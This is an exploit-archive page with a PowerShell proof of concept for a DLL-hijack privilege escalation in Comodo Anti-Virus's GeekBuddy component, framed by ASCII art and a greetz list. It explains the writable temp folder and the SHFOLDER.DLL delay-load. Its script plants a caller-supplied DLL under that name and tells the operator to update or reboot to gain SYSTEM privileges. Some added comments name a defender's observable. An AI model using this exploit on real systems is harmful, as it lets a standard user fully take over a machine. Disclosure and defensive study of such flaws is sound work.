Comodo Anti-Virus SHFolder.DLL - Local Privilege Elevation Exploit



EKU-ID: 5424 CVE: OSVDB-ID:
Author: Laughing_Mantis Published: 2016-03-01 Verified: Verified



<#
 
 
                                                   ````......````                                                            
                                              ``,;''''''''''''''''';,`                                                       
                                           .;''''''''''''''''''''''''''',`                                                   
                                       `:''''''''+';:,.``````.,:;'''''''''':`                                                
                                     ,;'''''';,.`                  ``,;'''''';:                                              
                                  `:'''''',.                            `,'''''';.                                           
                                `;+''+':`                  ,;              `,''''';.                                         
                              `;'''';.             ``    .:;'` `.             `;'''''.                                       
                          `  :+''';`          `,``:+''   ';;'`,'';  ``   ``      :'''';`                                     
                           .'''';`           ,';' '':'`  ';,'`'',' :''' .''`       :'''',                                    
                         `;''''`         ;'' :+.` ;';,   ';:' ''''`,;:+ '',         `;''''`                                  
                        .''''.     ;:`, .'.':`'''.:;`;.  +;:' '::; ;''' ';            .'''',                                 
                       :''';`   `  '''',`':'' ..;:`','`  '''' ':;;`'`';`':`   :;        :''';                                
                      ;''+,     .;`.'.'' ';.'`';': ,:. `  ` ` `,: .';',,'`;'.`';':       .+'''`                              
                    `''''`      ;'; ''.'.,','` ,`                  ``;`''  .`;'`''+:       ;'''`                             
                   `''''    .,  .'' ,'.'' ;;.         ````````         `.  ``'::'`;; `      :'''.                            
                 ``''':    `+,`  .':`'','        `,;''''''''''+'':.`        ;'.+:;'``':      .'''.                           
                 `''',      '',   ''`:;      `:'''''''''''''''''''''';.      `;'`': ''`'`     .''',                          
                `''',   `   `''`  `';     .''''''''''''''''''''''''''''';`    `.;' ;'.''`.:    `''',                         
               `''',     :''.`''   `    ,;'''''''''''''''''''''''''''''''';. `  `,.'::', ''`    .'''.                        
               ''',      '.''`,':     ,'''''''''''''''''''''''''''''''''''''', `  .+,'; '';      .'''`                       
              ''':       ''`'' ;.   `'''''''''''''''''';:::;';'''''''''''''''''.    ;' :': ,,`    .'''                       
             :'';        `''.'`  ` :''''''''''''';:::.',   `''';`:;'+'''','''''+;    `,'; :'''     ,'''                      
            .'''     ``   .++;   `''''''''''''`.     `':    ''';    `:''' :'''''''.   .+ :''.+.     :'':                     
           `''+     :'':   ``   ,'''''''''''''       `':    ''';       `: ,'''''''':   .`''.''   `   '''`                    
           ;''.    `+.',;      ;'''':''''''''; `      ',  .'''':       `  :''''';''';   `'.',`,',    `+''                    
          ,'':      '';,'.    ;''''':''''''''`+`      ;..`;'+''.        '.:''''';'''''```.+'  +:'`    .'';                   
         `'''    `;``+',;.`  ;''''':''''''''.';      `;'',    '`        '' ;''''','''''`    ;,+.+.     ;''.                  
         ;'+.    :'': ;':   ;'''''':''''':',''.      `'';.+'  '`        ,'; .'''';''''''`  `+.':`      `'''                  
        `'':    .+`;''` `  ;'''''':''''''.::''.      .''.     ::        `'';`,'''':''''''`  :+'.        ,'',                 
        '''`    :''.:''   :''''''':'''''; :''''      .'',   `.,;     :+'`''': ;''','''''''   ,`          '''                 
       .'':      `'';``  ,''''''':;''''':`''';',     ,''+` ,+':'     +'''''''`,''''''''''';         .+`  .'':                
       '''    `''. :',  `''''''':`'''''+.;';.:::::::,,''';`'': .     .'''''''; ''''.''''''',    `  ;'':   '''                
      .'',    ','';`.   '''''''; :'''''' `,;'''''''''.```   .   ''''';:,`:;''+`'''',,'''''''`    :'';`    `+':               
      '''`    ''.,';   ;'''''';  ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :'''''''   '''.       ;''               
     `'':     .'';:;  `'''''''` .+'', ,'''''''''''';  '''''''++`''''':..:'''' `'''''  ;'''''',  .,    ``   .'',              
   ` :''        :''`  ''''''+`  ;''``;'''''''''''''':``,,.`````,'''''.       ';.;'''` `'''''''`      .++.   '';              
     +''             ,'''''':   ;+`,'''''''''''''''''+''';;;;'''''''+`       :;+,`''. `.'''''';    .+'''`   :'+`             
    ,''.    ':       +''''';    ,,;''''''''''''''''''''''''''''''''''.  `.::,` `';.',   ;''''''`  :'':  `.  `'';             
    ;''    :;.;':   ,''''''.    `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;,   `''''''; `.;  .;'+`  ;''             
    '': `  ;';';'   '''''';     ''';;''''''',`.'',`   .:;;''''''''''.,'''''''''''.;;.    ,''''''   `;''''.   .''`            
   .''.    .';`;'  .''''''.    :+;;''''''''''': ;'    ::::...;''+'':,'''';..``;''';.      ''''''; `:''.`':   `'':            
   :''     `  ,'`  ;''''''.    :;'''''''''''''';`;,               `,''';` .:;;;'''':      ,''''''   .,''',    '''            
   ;';    ''';,`  `''''''''''` :''''''''''';.:'''`';:`            ,''';`;''''''''''',      ''''''.  ;';,`     :''`           
  `'',   .;,''';  ,'''''''''' ;'''''''''':`   :'''`::`          ``'''',+''''''''''''+`     ;''''';  .``.:;`   `''.           
  .''`   `+;'`;`  '''''''''';.'''''''',`       ''';`             :''';'''';::;'''''';;   ` `''''''`  ;'';;;   `+':           
  :''     ..;''  `''''''''''`'''''''',         .'''`            `+''';''.     ,'''''''''''''''''''''''''''''''''''''':`      
  ;''    :.  ``  .'''''''''';''''''''           ;'';            ;''':::`       :'''''''''''''''''''''''''''''''''''''''',    
  ;':    '''':`  :'''''''''''''''''',`          .'''            ''''.          `+'''''''''''''''''''''''''''''''''''''''''   
  '',    :,;'':  ;''''''''''''''''''`            ;''...        :''''`           :''''''''''''''''''''''''''''''''''''''''''` 
 `''.   `+'':,`  '''''''''''''''''';             ,'';.+`     . ,;'''            `''''''''''''''''''''''''''''''''''''''''''; 
 .''.   `.,;';   '''''''''';''''''',              ''',+. `` .'  .'''             ''''''''+'''''''''''''''''''''''''''''''''',
 .'+`   ;'''''          ``  '''''''`             `;''''.'++','`+.'''             '''''';                            `;+''''''
 ,''                        ''''';;               ,'''';'''';'``.'''             :''''''`                             .'''''':
 :'+                        '''''':               .'''';'''';'` .'''             ,''''''`                              ,''''';
 :''            ,''''',     ''''''`               .'''';'''';', .'''`            .''''''`                               ''''''
 ;''  `'''''';  :''''',     ''''''                .'''';'''';':,''''.            .''''''`                               ''''''
 ;''  `';'''''  :''''',     :'''';                :''''''''';''.'''''            `''''''`                               ;'''''
 ;''            :''''',     ,'''''               `+''''''''':''.'''''`           ,''''';                                ''''''
 :'+            ,''''',     `'''''.              ,'''''''''':''::'''';           ;''''':                               `''''''
 :''      ```.  ,''''':      ''''':             `''''''''''',''+`'''''.         `''''''.                               :''''''
 ,''` `'''''''  .''''';     `''''':             '''''''''''';''',,''''',        '''''''                               ,'''''',
 .''` `''':,.;  `''''''     `'''''':           '''''''''''''';'''`'''''':.   `,''''''',                             .''''''''
 `''`  `,;;;''`  ''''''     `'','''';,`     `,''''''''''''''',''':.''''''''''''''''''':`     ;'''''''''''''''''''''''''''''',
  '',   `+';;,   ''''''     `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+      ''''''''''''''''''''''''''''''; 
  '':   `   `,.  ;'''''.    `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;;     `''''''''''''''''''''''''''';';  
  ;';    ,'''';  :''''':    `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,',     ,'''''''''''''''''''''''''''';   
  ;''    ';;,..  .''''''    `''';;  :''''''''''''''''';'''''''. '''''`;'''''''''''';+'`     ;'''''''''''''''''''''''''';.    
  :''   `,:;'''   ''''''`   `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+:      '''''''';''''''''';''''';,`      
  .''.   .''',`   ;''''': `  ''':;''.  ````` :+'''''',;''''''',  '''''';..;''''''''''`     `''''''    `,'':   `+':           
   '':    `  .;.  ,'''''+    .'';,'''''''';:''''''''','''''''':  ;'''''''''.`,'''''''      ;''''';  ,'',      .''.           
   '';     :+.++` `''''''.   +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''',      ''''''.  ':''',    :''`           
   :''    ,';:.'.  ;''''''   ''''.:''''''''''''''''';;'''''''''''.'''.  `:;'''''':'':     :''''''   ';,.:'    '''            
   .''.   .;:'''   .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''',   '''''':   ,'''',   `'':            
    '';    ;';, ;`  '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';'   ,. .;:    ,''`            
    ;''       `;', `,'''''''''''''.,'''''''''''''';','''';:.``   `,.;'''''''''''.+''''''.'''''';  ,'+'.      '''             
    .''.    '''';`   ''''';''''''';`'''''''''''''':.'';:,;'''':`  ,:`:''''''''','',`:''':''''''`  '.:'''    `'':             
     '''   :'': `:.  ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.'''''';  `'''..'    :''              
     :''`  `,. ;:++`  ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+''''''  ;. ,+''`    '';              
     `'':    `'',`;:  `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,'    ,'',              
      ;''`   `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;''''''''  +.''+;      '''               
      `'':    ;'';` `   ''''''':''''';`'''''''',  '''''''''''''''.,''''`''''',:''''`,'''''''`  '''.:';    .'':               
       ''+`    ,`  ,+:  `'''''','''''':`'''''''` :''''''''''''';   ;'''`+''''`;'''':+''''''.` ` :'':;,    '''                
       .'':     ;';''.   .'''''';'''''',`'''''+  ''''''''''''''`  .,'';.''''' '''''''''''':   +'``;';    .'',                
        ''+`    :''; ,'`  :''''','''''''.,''''' ,''''''''''''''  :''''';''''','''';'''''';   ,.''. .``   '''                 
        `';;    `+. ;'':'  :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.''''''   :';`'';     :''.                 
         :'',`    `'':.''`  ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;''''''   ` :''.'''`  `'''                  
          '''     ;'.:''`    ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''`  .''``'+',:   '''`                  
          .';;    `;;';   `   :''''':'''''';'''`'';''''''''''': ,''''''''''`''';''''';    .,''` :`    ,'':                   
           ;'',    `',   `'.   ,''''';''''';'''''':''''''''''': .''''''''',`+';,'''';    ``.''';    ``'''                    
            '''`        `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'',   ,'`:'''''`    '''`                    
            .'''        ;'.''    `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',`   `;''''''';.   ;'',                     
             ,'';      ''.;',      ,';''''';,''''''`+,`   .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';                      
              ;'';    ''';',   '.   `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''                       
               ''':   .,,':   :':    +''''''',''';.:'+,.`     `.:''':`''''''''''; `'':'''''''''''''',`                       
                ''':     `   .''  `'`;'''''''..,.:+,`   ``.,.`    ,'''`;'''''''+.';'.:'''':;'''''+:.'`                       
                 ''':     ;:`+'`  ,:..,''''''; .+:   `:'+''''';`    ;'; .''''': `:';:+''';`''''''. .':                       
                 `''';    ; ;'.    .';'`;'''',;'.   .+''''''''''`    ;;'+:'''; .+'''''''';''''''.;,'';                       
                  `''''    ,';     :'`'`;'''':+`   `'''''''''''':     ;'';'''`;''''''''''''''''',.''';                       
                   `''''  ` `      `':. ';''.+.    `'''''''''''';     `'''''::'''.'''',`'''''': :';;''                       
                     ''''.        :;,'`:'.';',      '''''''''''':      ,'''','''..''': '''';;:,''. `''                       
                      :''':      `.+'' '''','       :''''''''''+.       ''''''':`'''' .''';:;`.'.:' ';                       
                       ,''''`      `,` ',;:'. `;;;,``'''::::;''; :';,   ,'''''' ;'''` +'''.''+'.:'+`':                       
                        `'''':      `  ;'':'  '''''+;.;  ``  ,:`''''',  `'''''`,'''' :'''.''''..''','.                       
                          :''''.        .,': :'''''''.`;'''';` .''''''`  '''':`+'''``''',;'''``''';:'.                       
                           `'''''`      `.'` ''''''';`'''''''': ,''''';  ;'''`''''; ''';:'''. ;''',''                        
                             ,'''''`    `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:                        
                               :''''',   .'  '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.                        
                                `:+'''';..;  '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+                         
                                  `,''''':'  ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:                         
                                     .;+':'  '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +                          
                                        .:+` '''''''`''''''+'''+.''''';  .' ;''' ;''.;,'' ' ''.:``:                          
                                          '. :'''''':.+'''''''',;''''',  ;: ;''; '''.'.,;,,:'' '`'                           
                                          ;; `'''''''``;'''''',`,'''''  `'` ''',.''',.:;`' ''.,.`;                           
                                          .+  ''''''' ` `.,,.`'; ''';   :; `''+`;'';;: :.;`',`; ;`                           
                                           +: `'''''``';;;;;'''', ``   `+. `''' '''::;;:;`;'`;..,                            
                                           ,'  ``.. `+''''''''''+`     :'  `'';`''':. ,.',''.; '                             
                                           `+'      :'''''''''''',    `+.`  '',.''',. :,''''+ ;                              
                                            .',     ;''''''''''''.    ':    ''.,''':` ;.''''.,.                              
                                             :'.    :''''''''''',    ;'`    ''.:''',':;.''':.:                               
                                              ''.     ,:''''',`     ;+`     :'.:'''' ':`''; ;                                
                                              `'',                 ''.       ::,''''``; :, '                                 
                                                ;+;`             .'+`         ``'':'`,;   '``                                
                                                 ,'';.        `.'';`            :';'.,;  '.                                  
                                                  `,''';:::::;'''.                ``+;' +`                                   
                                                     `,:''''';,`                     ,,;                                     
 
 
 
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
 
Since it took 146 days to fix a DLL hijack issue, I decided to drop this PoC:
 
###Technical Geeky Stuff###
 
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
 
The directory listing is as follows:
10/06/2015  12:08 AM    <DIR>          .
10/06/2015  12:08 AM    <DIR>          ..
10/02/2015  10:43 PM                27 download.cfg
10/02/2015  10:47 PM           637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015  10:44 PM         2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015  10:44 PM           547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015  12:07 AM         1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015  10:44 PM           554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015  12:06 AM           950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015  12:08 AM           563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015  10:43 PM           768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015  12:08 AM           581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015  10:47 PM           459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015  10:46 PM         1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015  12:07 AM         1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015  12:07 AM           648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015  10:43 PM                 1 survey_version.txt
10/06/2015  12:05 AM    <DIR>          updates
 
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
 
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                BUILTIN\Administrators:(OI)(CI)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                BUILTIN\Users:(OI)(CI)(ID)R
                                BUILTIN\Users:(CI)(ID)(special access:)
                                                      FILE_WRITE_DATA
                                                      FILE_APPEND_DATA
                                                      FILE_WRITE_EA
                                                      FILE_WRITE_ATTRIBUTES
 
Notice that the folder grants Users FILE_WRITE_DATA and FILE_WRITE_EA access.  This gives
non-administrator users the ability to create files in the directory, but not to delete or modify
existing files.
 
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe, which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder.  This service is auto-launched via the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher.
 
This binary then launches Unit_Manager.exe from the C:\Program Files\COMODO\GeekBuddy folder with
SYSTEM-level privileges.  Unit_Manager.exe in turn launches C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub-process in the C:\ProgramData\Comodo\lps4\temp\ folder.
 
During client connections to update servers and GeekBuddy executions, unit.exe launches
setup_clps_client_transaction_release-4.19.365037.89.exe.  This setup binary has a hardcoded
DLL-loading procedure that looks for SHFOLDER.DLL in the directory it is executed from.
 
.data:00409240                 dd offset aShfolder     ; "SHFOLDER"
.data:00409244                 dd offset aShgetfolderpat ; "SHGetFolderPathA"
 
During this delay-load procedure the executable loads SHFOLDER.DLL from its local directory before
searching the other PATH directories.
 
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ folder and triggering an
update or client connection to secure servers (which occurs automatically at user login), a user can
elevate their privileges to SYSTEM and fully compromise the system.
 
 
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
 
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times.  C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do.  #Ninja
Sizzop - for fixing my greetz
 
#########################################################################################################
 
 
#>
 
# PoC entry point. The script does exactly two things: it copies a
# caller-supplied DLL into the GeekBuddy temp folder under the fixed name
# SHFolder.dll (the name delay-loaded by the setup binary described in the
# header), then shows a tray balloon telling the operator what happens next.
# Nothing here elevates on its own; the only precondition it relies on is the
# folder ACL quoted above (Users: FILE_WRITE_DATA on the temp folder).
# Defender's observable: a file named SHFolder.dll being created in
# C:\ProgramData\Comodo\lps4\temp\ by a non-SYSTEM, non-admin account. If that
# folder no longer grants Users FILE_WRITE_DATA, the Copy-Item below fails and
# the PoC does nothing.
Param
(
 
    # Path of the DLL to plant. Also bindable from the pipeline by property
    # name. Default is an empty string; Test-Path does not accept an empty
    # Path, so with no argument the script stops at the throw below before
    # copying anything (NOTE(review): whether that surfaces as the throw or
    # as a binding error from Test-Path depends on the host — confirm).
    [Parameter(ValueFromPipelineByPropertyName = $true)]
    [string]$DLL = ""
)
 
 
 
 
# Refuse to continue if the source DLL is not present; this is the only
# input validation in the script.
if (!(Test-Path $DLL))
{
    throw "Fatal Error: The specified file: $DLL does not exist." 
}
 
# The entire PoC is this single file copy. Destination folder and filename
# are hard-coded to match the delay-load name in the header. -Force overwrites
# an existing file only where the caller has rights to; per the ACL above,
# Users can create but not modify existing files in this folder, so an already
# present SHFolder.dll would make this copy fail for a standard user.
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
 
# Informational only; note it is printed after the copy has already run.
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
 
 
# Loads WinForms for the tray balloon. LoadWithPartialName is a deprecated
# API (Add-Type -AssemblyName is the modern form); [void] discards the
# returned Assembly object so it is not written to the pipeline.
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
 
# Tray notification object; purely cosmetic, no part of the file drop.
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
 
 
# Use the icon associated with the running PowerShell host executable.
# System.Drawing is never loaded explicitly here; presumably it is pulled in
# transitively by System.Windows.Forms — verify on the target host.
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
# Multi-line literal: the embedded newline is part of the balloon text.
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
  
$objNotifyIcon.Visible = $True
# Balloon timeout in milliseconds. The NotifyIcon is never disposed, so the
# tray icon likely persists until the hosting process exits.
$objNotifyIcon.ShowBalloonTip(8000)